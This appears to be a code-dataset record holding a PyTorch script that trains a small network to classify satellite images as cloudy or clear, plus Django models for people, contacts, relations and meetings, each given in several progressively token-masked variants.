= Net(input_size, hidden_size, num_classes) # no device configuration here\ncriterion = nn.SoftMarginLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate) \n# model = TheModelClass(*args, **kwargs)\n# model.load_state_dict(torch.load(\"model.ckpt\"))\n# model.eval()\n# optimizer = TheOptimizerClass(*args, **kwargs)\n\n# checkpoint = torch.load('./model.ckpt')\n# model.load_state_dict(checkpoint['model_state_dict'])\n# optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n# epoch = checkpoint['epoch']\n# loss = checkpoint['loss']\n\n\ntotal_step = len(train_images)\nfor epoch in range(num_epochs):\n for i, image in enumerate(train_images): \n\n image = torch.Tensor(train_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(train_labels[i])])\n # label = label.long()\n # label = label.reshape(1,1)\n # label = label.squeeze()\n \n # Forward pass\n outputs = model(image)\n outputs = outputs.squeeze(0)\n # outputs.reshape(1,)\n loss = criterion(outputs, label)\n \n # Backward and optimize\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n if (i+1) % 100 == 0:\n print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}' \n .format(epoch+1, num_epochs, i+1, total_step, loss.item()))\n\n\n# %%\n\nwith 
torch.no_grad():\n correct = 0\n total = 0\n for i, image in enumerate(test_images):\n image = torch.Tensor(test_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(test_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n outputs = 1 if torch.sum(outputs) >= 0.5 else 0\n if outputs == torch.sum(label):\n correct += 1\n elif outputs == 0: \n print(\"#############\")\n print(i,outputs, torch.sum(label))\n # _, predicted = torch.max(outputs.data, 1)\n # correct += (predicted == labels).sum().item()\n\n print('Accuracy of the network on the {} test images: {} %'.format(len(test_images), 100 * correct / len(test_images)))\n\n\n\n# %%\n\ntorch.save(model.state_dict(), 'model.ckpt')\n\n# %%\n", "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport cv2\nimport imageio\nimport pandas as pd\nimport glob, os\nimport numpy as np\nfileDir = os.getcwd()\ninput_size = 65536\nhidden_size = 20\nhidden_size_1 = 15\nhidden_size_2 = 10\nhidden_size_3 = 5\nnum_classes = 1\nlearning_rate = 0.001\nnum_epochs = 5\ntrain_num = 1000\ntest_num = 148\nimages = []\nfor file in glob.glob('*.jpg'):\n images.append(file)\nimages = sorted(images, key=lambda filename: int(filename[6:-4]))\ntrain_images = []\ntest_images = []\ntrain_labels = []\ntest_labels = []\nlabels = pd.read_csv('./train_v2.csv')\nfor i in range(train_num + test_num):\n tags = labels.iloc[i]['tags']\n if i < train_num:\n train_images.append(imageio.imread(images[i], as_gray=True).flatten())\n train_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n else:\n test_images.append(imageio.imread(images[i], as_gray=True).flatten())\n test_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n\n\nclass Net(nn.Module):\n\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n self.h1 = nn.Linear(input_size, hidden_size)\n self.h2 = nn.Linear(hidden_size, hidden_size_1)\n self.h3 = nn.Linear(hidden_size_1, hidden_size_2)\n self.h4 = nn.Linear(hidden_size_2, hidden_size_3)\n self.o = nn.Linear(hidden_size_3, num_classes)\n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n\nmodel = Net(input_size, hidden_size, num_classes)\ncriterion = nn.SoftMarginLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\ntotal_step = len(train_images)\nfor epoch in range(num_epochs):\n for i, image in enumerate(train_images):\n image = torch.Tensor(train_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(train_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n loss = criterion(outputs, label)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (i + 1) % 100 == 0:\n print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'.format(epoch +\n 1, num_epochs, i + 1, total_step, loss.item()))\nwith torch.no_grad():\n correct = 0\n total = 0\n for i, image in enumerate(test_images):\n image = torch.Tensor(test_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(test_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n outputs = 1 if torch.sum(outputs) >= 0.5 else 0\n if outputs == torch.sum(label):\n correct += 1\n elif outputs == 0:\n print('#############')\n print(i, outputs, torch.sum(label))\n print('Accuracy of the network on the {} test images: {} %'.format(len(\n test_images), 100 * correct / 
len(test_images)))\ntorch.save(model.state_dict(), 'model.ckpt')\n", "<import token>\nfileDir = os.getcwd()\ninput_size = 65536\nhidden_size = 20\nhidden_size_1 = 15\nhidden_size_2 = 10\nhidden_size_3 = 5\nnum_classes = 1\nlearning_rate = 0.001\nnum_epochs = 5\ntrain_num = 1000\ntest_num = 148\nimages = []\nfor file in glob.glob('*.jpg'):\n images.append(file)\nimages = sorted(images, key=lambda filename: int(filename[6:-4]))\ntrain_images = []\ntest_images = []\ntrain_labels = []\ntest_labels = []\nlabels = pd.read_csv('./train_v2.csv')\nfor i in range(train_num + test_num):\n tags = labels.iloc[i]['tags']\n if i < train_num:\n train_images.append(imageio.imread(images[i], as_gray=True).flatten())\n train_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n else:\n test_images.append(imageio.imread(images[i], as_gray=True).flatten())\n test_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n\n\nclass Net(nn.Module):\n\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n self.h1 = nn.Linear(input_size, hidden_size)\n self.h2 = nn.Linear(hidden_size, hidden_size_1)\n self.h3 = nn.Linear(hidden_size_1, hidden_size_2)\n self.h4 = nn.Linear(hidden_size_2, hidden_size_3)\n self.o = nn.Linear(hidden_size_3, num_classes)\n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n\nmodel = Net(input_size, hidden_size, num_classes)\ncriterion = nn.SoftMarginLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\ntotal_step = len(train_images)\nfor epoch in range(num_epochs):\n for i, image in enumerate(train_images):\n image = torch.Tensor(train_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(train_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n loss = criterion(outputs, label)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (i + 1) % 100 == 0:\n print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'.format(epoch +\n 1, num_epochs, i + 1, total_step, loss.item()))\nwith torch.no_grad():\n correct = 0\n total = 0\n for i, image in enumerate(test_images):\n image = torch.Tensor(test_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(test_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n outputs = 1 if torch.sum(outputs) >= 0.5 else 0\n if outputs == torch.sum(label):\n correct += 1\n elif outputs == 0:\n print('#############')\n print(i, outputs, torch.sum(label))\n print('Accuracy of the network on the {} test images: {} %'.format(len(\n test_images), 100 * correct / len(test_images)))\ntorch.save(model.state_dict(), 'model.ckpt')\n", "<import token>\n<assignment token>\nfor file in glob.glob('*.jpg'):\n images.append(file)\n<assignment token>\nfor i in range(train_num + test_num):\n tags = labels.iloc[i]['tags']\n if i < train_num:\n train_images.append(imageio.imread(images[i], as_gray=True).flatten())\n train_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n else:\n test_images.append(imageio.imread(images[i], as_gray=True).flatten())\n test_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n\n\nclass Net(nn.Module):\n\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n self.h1 = nn.Linear(input_size, hidden_size)\n self.h2 = nn.Linear(hidden_size, hidden_size_1)\n self.h3 = nn.Linear(hidden_size_1, hidden_size_2)\n self.h4 = 
nn.Linear(hidden_size_2, hidden_size_3)\n self.o = nn.Linear(hidden_size_3, num_classes)\n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n\n<assignment token>\nfor epoch in range(num_epochs):\n for i, image in enumerate(train_images):\n image = torch.Tensor(train_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(train_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n loss = criterion(outputs, label)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (i + 1) % 100 == 0:\n print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'.format(epoch +\n 1, num_epochs, i + 1, total_step, loss.item()))\nwith torch.no_grad():\n correct = 0\n total = 0\n for i, image in enumerate(test_images):\n image = torch.Tensor(test_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(test_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n outputs = 1 if torch.sum(outputs) >= 0.5 else 0\n if outputs == torch.sum(label):\n correct += 1\n elif outputs == 0:\n print('#############')\n print(i, outputs, torch.sum(label))\n print('Accuracy of the network on the {} test images: {} %'.format(len(\n test_images), 100 * correct / len(test_images)))\ntorch.save(model.state_dict(), 'model.ckpt')\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n\n\nclass Net(nn.Module):\n\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n self.h1 = nn.Linear(input_size, hidden_size)\n self.h2 = nn.Linear(hidden_size, hidden_size_1)\n self.h3 = nn.Linear(hidden_size_1, hidden_size_2)\n self.h4 = nn.Linear(hidden_size_2, hidden_size_3)\n self.o = nn.Linear(hidden_size_3, num_classes)\n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n\n\nclass Net(nn.Module):\n <function token>\n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n\n\nclass Net(nn.Module):\n <function token>\n <function token>\n\n\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<assignment token>\n<code token>\n" ]
false
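The record above pairs a sigmoid output with nn.SoftMarginLoss, which expects targets in {-1, +1}, while the labels are coded as {0, 1}. A minimal sketch of the matching binary cross-entropy setup; the tensors are toy stand-ins for the script's per-image output and label.

import torch
import torch.nn as nn

criterion = nn.BCELoss()                  # expects probabilities and {0, 1} targets
output = torch.sigmoid(torch.randn(1))    # stand-in for model(image).squeeze(0)
label = torch.tensor([1.0])               # stand-in for the {0, 1} float label
loss = criterion(output, label)
print(loss.item())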
86
914f477518918619e0e42184bd03c2a7ed16bb01
from datetime import timedelta

from django.db import models


class Location(models.Model):
    id_location = models.AutoField(primary_key=True)
    city = models.CharField(max_length=100, null=True)
    street_name = models.CharField(max_length=100, null=True)
    street_number = models.IntegerField(null=True)
    zip = models.IntegerField(null=True)
    country = models.CharField(max_length=100, null=True)
    name = models.CharField(max_length=100, null=True)
    latitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)
    longitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)

    def __str__(self):
        return str(self.name) + ' - ' + str(self.country) + ': ' + str(self.city)


class Person(models.Model):
    id_person = models.AutoField(primary_key=True)
    nickname = models.CharField(max_length=100, null=True)
    first_name = models.CharField(max_length=100, null=True)
    last_name = models.CharField(max_length=100, null=True)
    # default=52 points at a pre-seeded fallback Location row
    id_location = models.ForeignKey(Location, on_delete=models.CASCADE, null=True, default=52)
    birth_day = models.DateField(default='1900-01-01')
    height = models.IntegerField(null=True)
    GENDER = (
        ('Female', 'Female'),
        ('Male', 'Male'),
    )
    gender = models.CharField(max_length=20, choices=GENDER, null=True)

    def __str__(self):
        return str(self.nickname) + ' ' + self.last_name + ' ' + self.first_name


class Contact_type(models.Model):
    id_contact_type = models.AutoField(primary_key=True)
    name = models.CharField(max_length=100)
    validation_regexp = models.CharField(max_length=100)

    def __str__(self):
        return str(self.name)


class Contact(models.Model):
    id_contact = models.AutoField(primary_key=True)
    id_person = models.ForeignKey(Person, on_delete=models.PROTECT)
    id_contact_type = models.ForeignKey(Contact_type, on_delete=models.PROTECT, null=True)
    contact = models.CharField(max_length=100, null=True)

    def __str__(self):
        return str(self.id_person) + ' ' + str(self.contact)


class Relation_type(models.Model):
    id_relation = models.AutoField(primary_key=True)
    name = models.CharField(max_length=100)

    def __str__(self):
        return str(self.name)


class Relation(models.Model):
    id_relation = models.AutoField(primary_key=True)
    id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT, related_name="who1")
    id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT, related_name="who2")
    description = models.CharField(max_length=100, null=True)
    id_relation_type = models.ForeignKey(Relation_type, on_delete=models.CASCADE)


class Meeting(models.Model):
    id_meeting = models.AutoField(primary_key=True)
    start_date = models.DateField()  # max_length is ignored on DateField/TimeField
    start_time = models.TimeField()
    description = models.CharField(max_length=100, null=True, default='')
    # DurationField needs a timedelta default, not a bare int
    duration = models.DurationField(default=timedelta(0))
    id_location = models.ForeignKey(Location, on_delete=models.CASCADE)

    def __str__(self):
        return str(self.start_time) + " - " + str(self.start_date) + " " + str(self.duration) + " " + str(
            self.description) + " " + str(self.id_location)


class Person_meeting(models.Model):
    id_person = models.ForeignKey(Person, on_delete=models.CASCADE)
    id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE, unique=False)
[ "from django.db import models\n\n\nclass Location(models.Model):\n id_location = models.AutoField(primary_key=True)\n city = models.CharField(max_length=100, null=True)\n street_name = models.CharField(max_length=100, null=True)\n street_number = models.IntegerField(null=True)\n zip = models.IntegerField(null=True)\n country = models.CharField(max_length=100, null=True)\n name = models.CharField(max_length=100, null=True)\n latitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)\n longitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)\n\n def __str__(self):\n # print('Name', type(self.name), '\\nCountry', type(self.country), '\\nCity', self.city)\n return str(self.name) + ' - ' + str(self.country) + ': ' + str(self.city)\n\n\nclass Person(models.Model):\n id_person = models.AutoField(primary_key=True)\n nickname = models.CharField(max_length=100, null=True)\n first_name = models.CharField(max_length=100, null=True)\n last_name = models.CharField(max_length=100, null=True)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE, null=True, default=52)\n birth_day = models.DateField(default='1900-01-01')\n height = models.IntegerField(null=True)\n GENDER = (\n ('Female', 'Female'),\n ('Male', 'Male'),\n )\n gender = models.CharField(max_length=20, choices=GENDER, null=True)\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT, related_name=\"who1\")\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT, related_name=\"who2\")\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + \" - \" + str(self.start_date) + \" \" + str(self.duration) + \" \" + str(\n self.description) + \" \" + str(self.id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE, unique=False)\n", "from django.db import models\n\n\nclass Location(models.Model):\n id_location = models.AutoField(primary_key=True)\n city = models.CharField(max_length=100, null=True)\n 
street_name = models.CharField(max_length=100, null=True)\n street_number = models.IntegerField(null=True)\n zip = models.IntegerField(null=True)\n country = models.CharField(max_length=100, null=True)\n name = models.CharField(max_length=100, null=True)\n latitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)\n longitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)\n\n def __str__(self):\n return str(self.name) + ' - ' + str(self.country) + ': ' + str(self\n .city)\n\n\nclass Person(models.Model):\n id_person = models.AutoField(primary_key=True)\n nickname = models.CharField(max_length=100, null=True)\n first_name = models.CharField(max_length=100, null=True)\n last_name = models.CharField(max_length=100, null=True)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE,\n null=True, default=52)\n birth_day = models.DateField(default='1900-01-01')\n height = models.IntegerField(null=True)\n GENDER = ('Female', 'Female'), ('Male', 'Male')\n gender = models.CharField(max_length=20, choices=GENDER, null=True)\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n\n\nclass Location(models.Model):\n id_location = models.AutoField(primary_key=True)\n city = models.CharField(max_length=100, null=True)\n street_name = models.CharField(max_length=100, null=True)\n street_number = models.IntegerField(null=True)\n zip = models.IntegerField(null=True)\n country = models.CharField(max_length=100, null=True)\n name = models.CharField(max_length=100, null=True)\n latitude = 
models.DecimalField(max_digits=6, decimal_places=3, null=True)\n longitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)\n\n def __str__(self):\n return str(self.name) + ' - ' + str(self.country) + ': ' + str(self\n .city)\n\n\nclass Person(models.Model):\n id_person = models.AutoField(primary_key=True)\n nickname = models.CharField(max_length=100, null=True)\n first_name = models.CharField(max_length=100, null=True)\n last_name = models.CharField(max_length=100, null=True)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE,\n null=True, default=52)\n birth_day = models.DateField(default='1900-01-01')\n height = models.IntegerField(null=True)\n GENDER = ('Female', 'Female'), ('Male', 'Male')\n gender = models.CharField(max_length=20, choices=GENDER, null=True)\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n\n\nclass Location(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n def __str__(self):\n return str(self.name) + ' - ' + str(self.country) + ': ' + str(self\n .city)\n\n\nclass Person(models.Model):\n id_person = models.AutoField(primary_key=True)\n nickname = models.CharField(max_length=100, null=True)\n first_name = models.CharField(max_length=100, null=True)\n last_name = models.CharField(max_length=100, null=True)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE,\n null=True, default=52)\n birth_day = 
models.DateField(default='1900-01-01')\n height = models.IntegerField(null=True)\n GENDER = ('Female', 'Female'), ('Male', 'Male')\n gender = models.CharField(max_length=20, choices=GENDER, null=True)\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n\n\nclass Location(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n\n\nclass Person(models.Model):\n id_person = models.AutoField(primary_key=True)\n nickname = models.CharField(max_length=100, null=True)\n first_name = models.CharField(max_length=100, null=True)\n last_name = models.CharField(max_length=100, null=True)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE,\n null=True, default=52)\n birth_day = models.DateField(default='1900-01-01')\n height = models.IntegerField(null=True)\n GENDER = ('Female', 'Female'), ('Male', 'Male')\n gender = models.CharField(max_length=20, choices=GENDER, null=True)\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n 
id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n\n\nclass Person(models.Model):\n id_person = models.AutoField(primary_key=True)\n nickname = models.CharField(max_length=100, null=True)\n first_name = models.CharField(max_length=100, null=True)\n last_name = models.CharField(max_length=100, null=True)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE,\n null=True, default=52)\n birth_day = models.DateField(default='1900-01-01')\n height = models.IntegerField(null=True)\n GENDER = ('Female', 'Female'), ('Male', 'Male')\n gender = models.CharField(max_length=20, choices=GENDER, null=True)\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = 
